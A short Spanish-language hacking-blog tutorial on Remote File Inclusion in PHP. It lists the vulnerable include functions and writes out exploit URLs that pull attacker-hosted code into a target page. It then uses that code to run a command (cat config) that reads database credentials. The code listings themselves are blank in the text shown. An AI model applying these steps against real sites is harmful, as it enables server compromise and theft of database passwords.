skip to main | skip to sidebar
Yoyahack
El inteligente no es aquel que lo sabe todo sino aquel que sabe utilizar lo poco que sabe
RSS
  • Home
  • Admin
  • Undersecurity
  • CPAN - Perl
  • PHP

[Tutorial] Remoto file inclusion (RFI)

Nivel web, vurnerabilidad 0 comentarios

Que es Remoto file inclusión (RFI) ?
Remote file inclusión (Inclusión remota de archivo) esta vulnerabilidad que permite el enlace de
archivos remotos situados en otros servidores a causa de una mala programación de la página
que contiene la función include ().

Algunas funciones vulnerables a RFI son:

Include ()
Include_once ()
require ()
require_once ()

Por ejemplo:
En una parte del index.php esta este code:




Lo que hace este code es incluir archivos remotamente mediante la variable
$f.

www.pagina.com/index.php?f=caciones.php

Lo que esta haciendo es incluyendo archives mediante la variable f.
Entonces se explotaría de la siguiente forma:

www.pagina.com/index.php?f=http://tupagina.com/archivo.txt?

Bueno Recuerde que su code tiene que estar en extensión .txt .gif. .jpg etc.... menos en php
porque se ejecutaría en nuestro servidor.

Entonces creamos un archivo con extensión .txt y le ponemos el code que se ejecutaría en su
servidor, bueno en este caso yo le pondré este:





Que sirve para ejecutar comandos en el servidor y se explotaría de la siguiente manera:

www.pagina.com/index.php?page=http//www.tupafina.com/archivo.txt?cmd=cat
config

Lo que estaría viendo la configuración de la BD y poder sacar el password de la BD.


10:49



0 responses to "[Tutorial] Remoto file inclusion (RFI)"


Publicar un comentario

Entrada más reciente Entrada antigua Inicio
Suscribirse a: Enviar comentarios (Atom)

    Fedora 15

    FayerWayer

    Cargando...

    Twitter

    Follow @Yoyahack

    Categoria

    • Captcha (1)
    • Exploit (1)
    • Herramientas (10)
    • MYSQL (2)
    • Nivel web (24)
    • Noticias (2)
    • Offtopic (2)
    • perl (11)
    • php (12)
    • POO (1)
    • programacion (19)
    • Regexp (2)
    • Tips (1)
    • vurnerabilidad (7)
    • XSS (2)

    Blog Archive

    • ►  2012 (1)
      • ►  abril (1)
    • ►  2011 (6)
      • ►  octubre (1)
      • ►  septiembre (1)
      • ►  agosto (1)
      • ►  junio (1)
      • ►  marzo (2)
    • ►  2010 (10)
      • ►  octubre (2)
      • ►  septiembre (1)
      • ►  agosto (1)
      • ►  junio (1)
      • ►  abril (2)
      • ►  febrero (3)
    • ▼  2009 (15)
      • ►  noviembre (1)
      • ►  octubre (1)
      • ►  septiembre (10)
      • ▼  agosto (3)
        • Automatisador de busqueda de google en perl
        • [Tutorial] Remoto file inclusion (RFI)
        • Bienvenidos

    Afiliados

    • ANTRAX
    • drvy
    • hachik0
    • Ksha
    • kt0sh
    • Lord RNA
    • Panic
    • pks
    • seth
    • SH4V
    • snakingmax